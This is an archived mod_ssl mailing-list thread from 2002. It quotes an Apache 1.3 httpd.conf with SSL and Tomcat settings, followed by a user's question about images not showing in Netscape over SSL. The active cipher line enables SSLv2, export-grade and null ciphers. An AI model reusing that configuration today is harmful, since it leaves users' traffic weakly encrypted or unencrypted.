>> # contents of the file itself to determine its type.  The 
>MIMEMagicFile
>> # directive tells the module where the hint definitions are located.
>> # mod_mime_magic is not part of the default server (you have to add
>> # it yourself with a LoadModule [see the DSO paragraph in the 'Global
>> # Environment' section], or recompile the server and include 
>mod_mime_magic
>> # as part of the configuration), so it's enclosed in an 
> container.
>> # This means that the MIMEMagicFile directive will only be 
>processed if the
>> # module is part of the server.
>> #
>> 
>>     MIMEMagicFile /usr/local/apache1.3/conf/magic
>> 
>> 
>> #
>> # HostnameLookups: Log the names of clients or just their IP 
>addresses
>> # e.g., www.apache.org (on) or 204.62.129.132 (off).
>> # The default is off because it'd be overall better for the 
>net if people
>> # had to knowingly turn this feature on, since enabling it means that
>> # each client request will result in AT LEAST one lookup 
>request to the
>> # nameserver.
>> #
>> HostnameLookups Off
>> 
>> #
>> # ErrorLog: The location of the error log file.
>> # If you do not specify an ErrorLog directive within a 
>> # container, error messages relating to that virtual host will be
>> # logged here.  If you *do* define an error logfile for a 
>
>> # container, that host's errors will be logged there and not here.
>> #
>> ErrorLog /usr/local/apache1.3/logs/error_log
>> 
>> #
>> # LogLevel: Control the number of messages logged to the error_log.
>> # Possible values include: debug, info, notice, warn, error, crit,
>> # alert, emerg.
>> #
>> LogLevel warn
>> 
>> #
>> # The following directives define some format nicknames for use with
>> # a CustomLog directive (see below).
>> #
>> LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" 
>\"%{User-Agent}i\"" combined
>> LogFormat "%h %l %u %t \"%r\" %>s %b" common
>> LogFormat "%{Referer}i -> %U" referer
>> LogFormat "%{User-agent}i" agent
>> 
>> #
>> # The location and format of the access logfile (Common 
>Logfile Format).
>> # If you do not define any access logfiles within a 
>> # container, they will be logged here.  Contrariwise, if you *do*
>> # define per- access logfiles, transactions will be
>> # logged therein and *not* in this file.
>> #
>> CustomLog /usr/local/apache1.3/logs/access_log common
>> 
>> #
>> # If you would like to have agent and referer logfiles, uncomment the
>> # following directives.
>> #
>> #CustomLog /usr/local/apache1.3/logs/referer_log referer
>> #CustomLog /usr/local/apache1.3/logs/agent_log agent
>> 
>> #
>> # If you prefer a single logfile with access, agent, and 
>referer information
>> # (Combined Logfile Format) you can use the following directive.
>> #
>> #CustomLog /usr/local/apache1.3/logs/access_log combined
>> 
>> #
>> # Optionally add a line containing the server version and 
>virtual host
>> # name to server-generated pages (error documents, FTP 
>directory listings,
>> # mod_status and mod_info output etc., but not CGI generated 
>documents).
>> # Set to "EMail" to also include a mailto: link to the ServerAdmin.
>> # Set to one of:  On | Off | EMail
>> #
>> ServerSignature On
>> 
>> #
>> # Aliases: Add here as many aliases as you need (with no 
>limit). The format is 
>> # Alias fakename realname
>> #
>> 
>> 
>>     #
>>     # Note that if you include a trailing / on fakename then 
>the server will
>>     # require it to be present in the URL.  So "/icons" 
>isn't aliased in this
>>     # example, only "/icons/".  If the fakename is 
>slash-terminated, then the 
>>     # realname must also be slash terminated, and if the 
>fakename omits the 
>>     # trailing slash, the realname must also omit it.
>>     #
>>     Alias /icons/ "/usr/local/apache1.3/icons/"
>> 
>>     
>>         Options Indexes MultiViews
>>         AllowOverride None
>>         Order allow,deny
>>         Allow from all
>>     
>> 
>>     # This Alias will project the on-line documentation tree 
>under /manual/
>>     # even if you change the DocumentRoot. Comment it if you 
>don't want to 
>>     # provide access to the on-line documentation.
>>     #
>>     Alias /manual/ "/usr/local/apache1.3/htdocs/manual/"
>> 
>>     
>>         Options Indexes FollowSymlinks MultiViews
>>         AllowOverride None
>>         Order allow,deny
>>         Allow from all
>>     
>> 
>>     #
>>     # ScriptAlias: This controls which directories contain 
>server scripts.
>>     # ScriptAliases are essentially the same as Aliases, except that
>>     # documents in the realname directory are treated as 
>applications and
>>     # run by the server when requested rather than as 
>documents sent to the client.
>>     # The same rules about trailing "/" apply to ScriptAlias 
>directives as to
>>     # Alias.
>>     #
>>     ScriptAlias /cgi-bin/ "/usr/local/apache1.3/cgi-bin/"
>> 
>>     #
>>     # "/usr/local/apache1.3/cgi-bin" should be changed to 
>whatever your ScriptAliased
>>     # CGI directory exists, if you have that configured.
>>     #
>>     
>>         AllowOverride None
>>         Options None
>>         Order allow,deny
>>         Allow from all
>>     
>> 
>> 
>> # End of aliases.
>> 
>> #
>> # Redirect allows you to tell clients about documents which 
>used to exist in
>> # your server's namespace, but do not anymore. This allows 
>you to tell the
>> # clients where to look for the relocated document.
>> # Format: Redirect old-URI new-URL
>> #
>> 
>> #
>> # Directives controlling the display of server-generated 
>directory listings.
>> #
>> 
>> 
>>     #
>>     # FancyIndexing is whether you want fancy directory 
>indexing or standard
>>     #
>>     IndexOptions FancyIndexing
>> 
>>     #
>>     # AddIcon* directives tell the server which icon to show 
>for different
>>     # files or filename extensions.  These are only displayed for
>>     # FancyIndexed directories.
>>     #
>>     AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip
>> 
>>     AddIconByType (TXT,/icons/text.gif) text/*
>>     AddIconByType (IMG,/icons/image2.gif) image/*
>>     AddIconByType (SND,/icons/sound2.gif) audio/*
>>     AddIconByType (VID,/icons/movie.gif) video/*
>> 
>>     AddIcon /icons/binary.gif .bin .exe
>>     AddIcon /icons/binhex.gif .hqx
>>     AddIcon /icons/tar.gif .tar
>>     AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
>>     AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
>>     AddIcon /icons/a.gif .ps .ai .eps
>>     AddIcon /icons/layout.gif .html .shtml .htm .pdf
>>     AddIcon /icons/text.gif .txt
>>     AddIcon /icons/c.gif .c
>>     AddIcon /icons/p.gif .pl .py
>>     AddIcon /icons/f.gif .for
>>     AddIcon /icons/dvi.gif .dvi
>>     AddIcon /icons/uuencoded.gif .uu
>>     AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
>>     AddIcon /icons/tex.gif .tex
>>     AddIcon /icons/bomb.gif core
>> 
>>     AddIcon /icons/back.gif ..
>>     AddIcon /icons/hand.right.gif README
>>     AddIcon /icons/folder.gif ^^DIRECTORY^^
>>     AddIcon /icons/blank.gif ^^BLANKICON^^
>> 
>>     #
>>     # DefaultIcon is which icon to show for files which do 
>not have an icon
>>     # explicitly set.
>>     #
>>     DefaultIcon /icons/unknown.gif
>> 
>>     #
>>     # AddDescription allows you to place a short description 
>after a file in
>>     # server-generated indexes.  These are only displayed 
>for FancyIndexed
>>     # directories.
>>     # Format: AddDescription "description" filename
>>     #
>>     #AddDescription "GZIP compressed document" .gz
>>     #AddDescription "tar archive" .tar
>>     #AddDescription "GZIP compressed tar archive" .tgz
>> 
>>     #
>>     # ReadmeName is the name of the README file the server 
>will look for by
>>     # default, and append to directory listings.
>>     #
>>     # HeaderName is the name of a file which should be prepended to
>>     # directory indexes. 
>>     #
>>     # If MultiViews are amongst the Options in effect, the 
>server will
>>     # first look for name.html and include it if found.  If name.html
>>     # doesn't exist, the server will then look for name.txt 
>and include
>>     # it as plaintext if found.
>>     #
>>     ReadmeName README
>>     HeaderName HEADER
>> 
>>     #
>>     # IndexIgnore is a set of filenames which directory 
>indexing should ignore
>>     # and not include in the listing.  Shell-style 
>wildcarding is permitted.
>>     #
>>     IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t
>> 
>> 
>> # End of indexing directives.
>> 
>> #
>> # Document types.
>> #
>> 
>> 
>>     #
>>     # AddEncoding allows you to have certain browsers 
>(Mosaic/X 2.1+) uncompress
>>     # information on the fly. Note: Not all browsers support this.
>>     # Despite the name similarity, the following Add* 
>directives have nothing
>>     # to do with the FancyIndexing customization directives above.
>>     #
>>     AddEncoding x-compress Z
>>     AddEncoding x-gzip gz tgz
>> 
>>     #
>>     # AddLanguage allows you to specify the language of a 
>document. You can
>>     # then use content negotiation to give a browser a file 
>in a language
>>     # it can understand.  
>>     #
>>     # Note 1: The suffix does not have to be the same as the 
>language 
>>     # keyword --- those with documents in Polish (whose net-standard 
>>     # language code is pl) may wish to use "AddLanguage pl .po" to 
>>     # avoid the ambiguity with the common suffix for perl scripts.
>>     #
>>     # Note 2: The example entries below illustrate that in quite
>>     # some cases the two character 'Language' abbreviation is not
>>     # identical to the two character 'Country' code for its country,
>>     # E.g. 'Danmark/dk' versus 'Danish/da'.
>>     #
>>     # Note 3: In the case of 'ltz' we violate the RFC by 
>using a three char 
>>     # specifier. But there is 'work in progress' to fix this and get 
>>     # the reference data for rfc1766 cleaned up.
>>     #
>>     # Danish (da) - Dutch (nl) - English (en) - Estonian (ee)
>>     # French (fr) - German (de) - Greek-Modern (el)
>>     # Italian (it) - Korean (kr) - Norwegian (no) - 
>Norwegian Nynorsk (nn)
>>     # Portugese (pt) - Luxembourgeois* (ltz)
>>     # Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cz)
>>     # Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
>>     # Russian (ru)
>>     #
>>     AddLanguage da .dk
>>     AddLanguage nl .nl
>>     AddLanguage en .en
>>     AddLanguage et .ee
>>     AddLanguage fr .fr
>>     AddLanguage de .de
>>     AddLanguage el .el
>>     AddLanguage he .he
>>     AddCharset ISO-8859-8 .iso8859-8
>>     AddLanguage it .it
>>     AddLanguage ja .ja
>>     AddCharset ISO-2022-JP .jis
>>     AddLanguage kr .kr
>>     AddCharset ISO-2022-KR .iso-kr
>>     AddLanguage nn .nn
>>     AddLanguage no .no
>>     AddLanguage pl .po
>>     AddCharset ISO-8859-2 .iso-pl
>>     AddLanguage pt .pt
>>     AddLanguage pt-br .pt-br
>>     AddLanguage ltz .lu
>>     AddLanguage ca .ca
>>     AddLanguage es .es
>>     AddLanguage sv .sv
>>     AddLanguage cz .cz
>>     AddLanguage ru .ru
>>     AddLanguage zh-tw .tw
>>     AddLanguage tw .tw
>>     AddCharset Big5         .Big5    .big5
>>     AddCharset WINDOWS-1251 .cp-1251
>>     AddCharset CP866        .cp866
>>     AddCharset ISO-8859-5   .iso-ru
>>     AddCharset KOI8-R       .koi8-r
>>     AddCharset UCS-2        .ucs2
>>     AddCharset UCS-4        .ucs4
>>     AddCharset UTF-8        .utf8
>> 
>>     # LanguagePriority allows you to give precedence to some 
>languages
>>     # in case of a tie during content negotiation.
>>     #
>>     # Just list the languages in decreasing order of 
>preference. We have
>>     # more or less alphabetized them here. You probably want 
>to change this.
>>     #
>>     
>>         LanguagePriority en da nl et fr de el it ja kr no pl 
>pt pt-br ru ltz ca es sv tw
>>     
>> 
>>     #
>>     # AddType allows you to tweak mime.types without 
>actually editing it, or to
>>     # make certain files to be certain types.
>>     #
>>     AddType application/x-tar .tgz
>>     AddType image/x-icon .ico
>> 
>>     #
>>     # AddHandler allows you to map certain file extensions 
>to "handlers",
>>     # actions unrelated to filetype. These can be either 
>built into the server
>>     # or added with the Action command (see below)
>>     #
>>     # If you want to use server side includes, or CGI outside
>>     # ScriptAliased directories, uncomment the following lines.
>>     #
>>     # To use CGI scripts:
>>     #
>>     #AddHandler cgi-script .cgi
>> 
>>     #
>>     # To use server-parsed HTML files
>>     #
>>     #AddType text/html .shtml
>>     #AddHandler server-parsed .shtml
>> 
>>     #
>>     # Uncomment the following line to enable Apache's 
>send-asis HTTP file
>>     # feature
>>     #
>>     #AddHandler send-as-is asis
>> 
>>     #
>>     # If you wish to use server-parsed imagemap files, use
>>     #
>>     #AddHandler imap-file map
>> 
>>     #
>>     # To enable type maps, you might want to use
>>     #
>>     #AddHandler type-map var
>> 
>> 
>> # End of document types.
>> 
>> #
>> # Action lets you define media types that will execute a 
>script whenever
>> # a matching file is called. This eliminates the need for 
>repeated URL
>> # pathnames for oft-used CGI file processors.
>> # Format: Action media/type /cgi-script/location
>> # Format: Action handler-name /cgi-script/location
>> #
>> 
>> #
>> # MetaDir: specifies the name of the directory in which 
>Apache can find
>> # meta information files. These files contain additional HTTP headers
>> # to include when sending the document
>> #
>> #MetaDir .web
>> 
>> #
>> # MetaSuffix: specifies the file name suffix for the file 
>containing the
>> # meta information.
>> #
>> #MetaSuffix .meta
>> 
>> #
>> # Customizable error response (Apache style)
>> #  these come in three flavors
>> #
>> #    1) plain text
>> #ErrorDocument 500 "The server made a boo boo.
>> #  n.b.  the single leading (") marks it as text, it does 
>not get output
>> #
>> #    2) local redirects
>> #ErrorDocument 404 /missing.html
>> #  to redirect to local URL /missing.html
>> #ErrorDocument 404 /cgi-bin/missing_handler.pl
>> #  N.B.: You can redirect to a script or a document using 
>server-side-includes.
>> #
>> #    3) external redirects
>> #ErrorDocument 402 
>http://some.other-server.com/subscription_info.html
>> #  N.B.: Many of the environment variables associated with 
>the original
>> #  request will *not* be available to such a script.
>> 
>> #
>> # Customize behaviour based on the browser
>> #
>> 
>> 
>>     #
>>     # The following directives modify normal HTTP response behavior.
>>     # The first directive disables keepalive for Netscape 
>2.x and browsers that
>>     # spoof it. There are known problems with these browser 
>implementations.
>>     # The second directive is for Microsoft Internet Explorer 4.0b2
>>     # which has a broken HTTP/1.1 implementation and does 
>not properly
>>     # support keepalive when it is used on 301 or 302 
>(redirect) responses.
>>     #
>>     BrowserMatch "Mozilla/2" nokeepalive
>>     BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 
>force-response-1.0
>> 
>>     #
>>     # The following directive disables HTTP/1.1 responses to 
>browsers which
>>     # are in violation of the HTTP/1.0 spec by not being 
>able to grok a
>>     # basic 1.1 response.
>>     #
>>     BrowserMatch "RealPlayer 4\.0" force-response-1.0
>>     BrowserMatch "Java/1\.0" force-response-1.0
>>     BrowserMatch "JDK/1\.0" force-response-1.0
>> 
>> 
>> # End of browser customization directives
>> 
>> #
>> # Allow server status reports, with the URL of 
>http://servername/server-status
>> # Change the ".your-domain.com" to match your domain to enable.
>> #
>> #
>> #    SetHandler server-status
>> #    Order deny,allow
>> #    Deny from all
>> #    Allow from .your-domain.com
>> #
>> 
>> #
>> # Allow remote server configuration reports, with the URL of
>> # http://servername/server-info (requires that mod_info.c be loaded).
>> # Change the ".your-domain.com" to match your domain to enable.
>> #
>> #
>> #    SetHandler server-info
>> #    Order deny,allow
>> #    Deny from all
>> #    Allow from .your-domain.com
>> #
>> 
>> #
>> # There have been reports of people trying to abuse an old 
>bug from pre-1.1
>> # days.  This bug involved a CGI script distributed as a 
>part of Apache.
>> # By uncommenting these lines you can redirect these attacks 
>to a logging 
>> # script on phf.apache.org.  Or, you can record them 
>yourself, using the script
>> # support/phf_abuse_log.cgi.
>> #
>> #
>> #    Deny from all
>> #    ErrorDocument 403 http://phf.apache.org/phf_abuse_log.cgi
>> #
>> 
>> #
>> # Proxy Server directives. Uncomment the following lines to
>> # enable the proxy server:
>> #
>> #
>> #    ProxyRequests On
>> 
>> #    
>> #        Order deny,allow
>> #        Deny from all
>> #        Allow from .your-domain.com
>> #    
>> 
>>     #
>>     # Enable/disable the handling of HTTP/1.1 "Via:" headers.
>>     # ("Full" adds the server version; "Block" removes all 
>outgoing Via: headers)
>>     # Set to one of: Off | On | Full | Block
>>     #
>> #    ProxyVia On
>> 
>>     #
>>     # To enable the cache as well, edit and uncomment the 
>following lines:
>>     # (no cacheing without CacheRoot)
>>     #
>> #    CacheRoot "/usr/local/apache1.3/proxy"
>> #    CacheSize 5
>> #    CacheGcInterval 4
>> #    CacheMaxExpire 24
>> #    CacheLastModifiedFactor 0.1
>> #    CacheDefaultExpire 1
>> #    NoCache a-domain.com another-domain.edu joes.garage-sale.com
>> 
>> #
>> # End of proxy directives.
>> 
>> ### Section 3: Virtual Hosts
>> #
>> # VirtualHost: If you want to maintain multiple 
>domains/hostnames on your
>> # machine you can setup VirtualHost containers for them. 
>Most configurations
>> # use only name-based virtual hosts so the server doesn't 
>need to worry about
>> # IP addresses. This is indicated by the asterisks in the 
>directives below.
>> #
>> # Please see the documentation at 
>
>> # for further details before you try to setup virtual hosts.
>> #
>> # You may use the command line option '-S' to verify your 
>virtual host
>> # configuration.
>> 
>> #
>> # Use name-based virtual hosting.
>> #
>> #NameVirtualHost *
>> 
>> #
>> # VirtualHost example:
>> # Almost any Apache directive may go into a VirtualHost container.
>> # The first VirtualHost section is used for requests without a known
>> # server name.
>> #
>> #
>> #    ServerAdmin webmaster@dummy-host.example.com
>> #    DocumentRoot /www/docs/dummy-host.example.com
>> #    ServerName dummy-host.example.com
>> #    ErrorLog logs/dummy-host.example.com-error_log
>> #    CustomLog logs/dummy-host.example.com-access_log common
>> #
>> 
>> #
>> #
>> 
>> ##
>> ##  SSL Global Context
>> ##
>> ##  All SSL configuration in this context applies both to
>> ##  the main server and all SSL-enabled virtual hosts.
>> ##
>> 
>> #
>> #   Some MIME-types for downloading Certificates and CRLs
>> #
>> 
>> AddType application/x-x509-ca-cert .crt
>> AddType application/x-pkcs7-crl    .crl
>> 
>> 
>> 
>> 
>> #   Pass Phrase Dialog:
>> #   Configure the pass phrase gathering process.
>> #   The filtering dialog program (`builtin' is a internal
>> #   terminal dialog) has to provide the pass phrase on stdout.
>> SSLPassPhraseDialog  builtin
>> 
>> #   Inter-Process Session Cache:
>> #   Configure the SSL Session Cache: First the mechanism 
>> #   to use and second the expiring timeout (in seconds).
>> #SSLSessionCache        none
>> #SSLSessionCache        
>shmht:/usr/local/apache1.3/logs/ssl_scache(512000)
>> #SSLSessionCache        
>shmcb:/usr/local/apache1.3/logs/ssl_scache(512000)
>> SSLSessionCache         dbm:/usr/local/apache1.3/logs/ssl_scache
>> SSLSessionCacheTimeout  300
>> 
>> #   Semaphore:
>> #   Configure the path to the mutual exclusion semaphore the
>> #   SSL engine uses internally for inter-process synchronization. 
>> SSLMutex  file:/usr/local/apache1.3/logs/ssl_mutex
>> 
>> #   Pseudo Random Number Generator (PRNG):
>> #   Configure one or more sources to seed the PRNG of the 
>> #   SSL library. The seed data should be of good random quality.
>> #   WARNING! On some platforms /dev/random blocks if not 
>enough entropy
>> #   is available. This means you then cannot use the 
>/dev/random device
>> #   because it would lead to very long connection times (as long as
>> #   it requires to make more entropy available). But usually those
>> #   platforms additionally provide a /dev/urandom device 
>which doesn't
>> #   block. So, if available, use this one instead. Read the 
>mod_ssl User
>> #   Manual for more details.
>> SSLRandomSeed startup builtin
>> SSLRandomSeed connect builtin
>> #SSLRandomSeed startup file:/dev/random  512
>> #SSLRandomSeed startup file:/dev/urandom 512
>> #SSLRandomSeed connect file:/dev/random  512
>> #SSLRandomSeed connect file:/dev/urandom 512
>> 
>> #   Logging:
>> #   The home of the dedicated SSL protocol logfile. Errors are
>> #   additionally duplicated in the general error log file.  Put
>> #   this somewhere where it cannot be used for symlink attacks on
>> #   a real server (i.e. somewhere where only root can write).
>> #   Log levels are (ascending order: higher ones include lower ones):
>> #   none, error, warn, info, trace, debug.
>> SSLLog      /usr/local/apache1.3/logs/ssl_engine_log
>> SSLLogLevel info
>> 
>> 
>> 
>> 
>> 
>> ##
>> ## SSL Virtual Host Context
>> ##
>> 
>> #   SSL Engine Switch:
>> #   Enable/Disable SSL for this virtual host.
>> #SSLEngine on
>> 
>> #   SSL Cipher Suite:
>> #   List the ciphers that the client is permitted to negotiate.
>> #   See the mod_ssl documentation for a complete list.
>> SSLCipherSuite 
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>> 
>> #   Server Certificate:
>> #   Point SSLCertificateFile at a PEM encoded certificate.  If
>> #   the certificate is encrypted, then you will be prompted for a
>> #   pass phrase.  Note that a kill -HUP will prompt again. A test
>> #   certificate can be generated with `make certificate' under
>> #   built time. Keep in mind that if you've both a RSA and a DSA
>> #   certificate you can configure both in parallel (to also allow
>> #   the use of DSA ciphers, etc.)
>> SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server.crt
>> #SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server-dsa.crt
>> 
>> #   Server Private Key:
>> #   If the key is not combined with the certificate, use this
>> #   directive to point at the key file.  Keep in mind that if
>> #   you've both a RSA and a DSA private key you can configure
>> #   both in parallel (to also allow the use of DSA ciphers, etc.)
>> SSLCertificateKeyFile /usr/local/apache1.3/conf/ssl.key/server.key
>> #SSLCertificateKeyFile 
>/usr/local/apache1.3/conf/ssl.key/server-dsa.key
>> 
>> #   Server Certificate Chain:
>> #   Point SSLCertificateChainFile at a file containing the
>> #   concatenation of PEM encoded CA certificates which form the
>> #   certificate chain for the server certificate. Alternatively
>> #   the referenced file can be the same as SSLCertificateFile
>> #   when the CA certificates are directly appended to the server
>> #   certificate for convinience.
>> #SSLCertificateChainFile /usr/local/apache1.3/conf/ssl.crt/ca.crt
>> 
>> #   Certificate Authority (CA):
>> #   Set the CA certificate verification path where to find CA
>> #   certificates for client authentication or alternatively one
>> #   huge file containing all of them (file must be PEM encoded)
>> #   Note: Inside SSLCACertificatePath you need hash symlinks
>> #         to point to the certificate files. Use the provided
>> #         Makefile to update the hash symlinks after changes.
>> #SSLCACertificatePath /usr/local/apache1.3/conf/ssl.crt
>> #SSLCACertificateFile /usr/local/apache1.3/conf/ssl.crt/ca-bundle.crt
>> 
>> #   Certificate Revocation Lists (CRL):
>> #   Set the CA revocation path where to find CA CRLs for client
>> #   authentication or alternatively one huge file containing all
>> #   of them (file must be PEM encoded)
>> #   Note: Inside SSLCARevocationPath you need hash symlinks
>> #         to point to the certificate files. Use the provided
>> #         Makefile to update the hash symlinks after changes.
>> #SSLCARevocationPath /usr/local/apache1.3/conf/ssl.crl
>> #SSLCARevocationFile /usr/local/apache1.3/conf/ssl.crl/ca-bundle.crl
>> 
>> #   Client Authentication (Type):
>> #   Client certificate verification type and depth.  Types are
>> #   none, optional, require and optional_no_ca.  Depth is a
>> #   number which specifies how deeply to verify the certificate
>> #   issuer chain before deciding the certificate is not valid.
>> #SSLVerifyClient require
>> #SSLVerifyDepth  10
>> 
>> #   Access Control:
>> #   With SSLRequire you can do per-directory access control based
>> #   on arbitrary complex boolean expressions containing server
>> #   variable checks and other lookup directives.  The syntax is a
>> #   mixture between C and Perl.  See the mod_ssl documentation
>> #   for more details.
>> #
>> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
>> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
>> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
>> #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
>> #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
>> #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
>> #
>> 
>> #   SSL Engine Options:
>> #   Set various options for the SSL engine.
>> #   o FakeBasicAuth:
>> #     Translate the client X.509 into a Basic Authorisation. 
> This means that
>> #     the standard Auth/DBMAuth methods can be used for 
>access control.  The
>> #     user name is the `one line' version of the client's 
>X.509 certificate.
>> #     Note that no password is obtained from the user. Every 
>entry in the user
>> #     file needs this password: `xxj31ZMTZzkVA'.
>> #   o ExportCertData:
>> #     This exports two additional environment variables: 
>SSL_CLIENT_CERT and
>> #     SSL_SERVER_CERT. These contain the PEM-encoded 
>certificates of the
>> #     server (always existing) and the client (only existing 
>when client
>> #     authentication is used). This can be used to import 
>the certificates
>> #     into CGI scripts.
>> #   o StdEnvVars:
>> #     This exports the standard SSL/TLS related `SSL_*' 
>environment variables.
>> #     Per default this exportation is switched off for 
>performance reasons,
>> #     because the extraction step is an expensive operation 
>and is usually
>> #     useless for serving static content. So one usually enables the
>> #     exportation for CGI and SSI requests only.
>> #   o CompatEnvVars:
>> #     This exports obsolete environment variables for 
>backward compatibility
>> #     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and 
>Stronghold 2.x. Use this
>> #     to provide compatibility to existing CGI scripts.
>> #   o StrictRequire:
>> #     This denies access when "SSLRequireSSL" or 
>"SSLRequire" applied even
>> #     under a "Satisfy any" situation, i.e. when it applies 
>access is denied
>> #     and no other module can change it.
>> #   o OptRenegotiate:
>> #     This enables optimized SSL connection renegotiation 
>handling when SSL
>> #     directives are used in per-directory context. 
>> #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars 
>+StrictRequire
>> 
>>     SSLOptions +StdEnvVars
>> 
>> 
>>     SSLOptions +StdEnvVars
>> 
>> 
>> #   SSL Protocol Adjustments:
>> #   The safe and default but still SSL/TLS standard 
>compliant shutdown
>> #   approach is that mod_ssl sends the close notify alert 
>but doesn't wait for
>> #   the close notify alert from client. When you need a 
>different shutdown
>> #   approach you can use one of the following variables:
>> #   o ssl-unclean-shutdown:
>> #     This forces an unclean shutdown when the connection is 
>closed, i.e. no
>> #     SSL close notify alert is send or allowed to received. 
> This violates
>> #     the SSL/TLS standard but is needed for some brain-dead 
>browsers. Use
>> #     this when you receive I/O errors because of the 
>standard approach where
>> #     mod_ssl sends the close notify alert.
>> #   o ssl-accurate-shutdown:
>> #     This forces an accurate shutdown when the connection 
>is closed, i.e. a
>> #     SSL close notify alert is send and mod_ssl waits for 
>the close notify
>> #     alert of the client. This is 100% SSL/TLS standard 
>compliant, but in
>> #     practice often causes hanging connections with 
>brain-dead browsers. Use
>> #     this only for browsers where you know that their SSL 
>implementation
>> #     works correctly. 
>> #   Notice: Most problems of broken clients are also related 
>to the HTTP
>> #   keep-alive facility, so you usually additionally want to disable
>> #   keep-alive for those clients, too. Use variable 
>"nokeepalive" for this.
>> #   Similarly, one has to force some clients to use HTTP/1.0 
>to workaround
>> #   their broken HTTP/1.1 implementation. Use variables 
>"downgrade-1.0" and
>> #   "force-response-1.0" for this.
>> SetEnvIf User-Agent ".*MSIE.*" \
>>          nokeepalive ssl-unclean-shutdown \
>>          downgrade-1.0 force-response-1.0
>> 
>> #   Per-Server Logging:
>> #   The home of a custom SSL log file. Use this when you want a
>> #   compact non-error SSL logfile on a virtual host basis.
>> CustomLog /usr/local/apache1.3/logs/ssl_request_log \
>>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>> 
>> 
>> 
>> 
>> 
>> # Tomcat mod_jk include
>> Include /usr/local/tomcat/conf/auto/mod_jk.conf
>> JkMount /*.xml ajp13
>> 
>> JkExtractSSL On
>> JkHTTPSIndicator HTTPS
>> JkSESSIONIndicator SSL_SESSION_ID
>> JkCIPHERIndicator SSL_CIPHER
>> JkCERTSIndicator SSL_CLIENT_CERT
>> 
>> # End of Tomcat mod_jk directives
>> 
>> 
>______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 22:21:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00233; Wed, 20 Nov 2002 22:20:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hoemail2.firewall.lucent.com id WAA00127; Wed, 20 Nov 2002 22:19:43 +0100 (MET)
Received: from il0015exch001h.wins.lucent.com (h135-1-23-83.lucent.com [135.1.23.83])
	by hoemail2.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id gAKLJS920887
	for ; Wed, 20 Nov 2002 16:19:29 -0500 (EST)
Received: by il0015exch001h.ih.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 20 Nov 2002 15:19:28 -0600
Message-ID: 
From: "Mitchel, Jennifer (Jem)" 
To: "'modssl-users@modssl.org'" 
Subject: graphics don't display in Netscape with SSL on
Date: Wed, 20 Nov 2002 15:19:26 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchel, Jennifer (Jem)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

  I finally have my whole site running the way it should with one exception...

  in Netscape all the graphics on the pages show up as a little key that if you right click on it for the menu you get in the menu View Image   (internal-icon-insecure).  Is there something I can do to the graphics so that they display in Netscape?

Thanks
Jem
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 22:59:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA01263; Wed, 20 Nov 2002 22:58:44 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.rdcss.com id WAA01250; Wed, 20 Nov 2002 22:57:20 +0100 (MET)
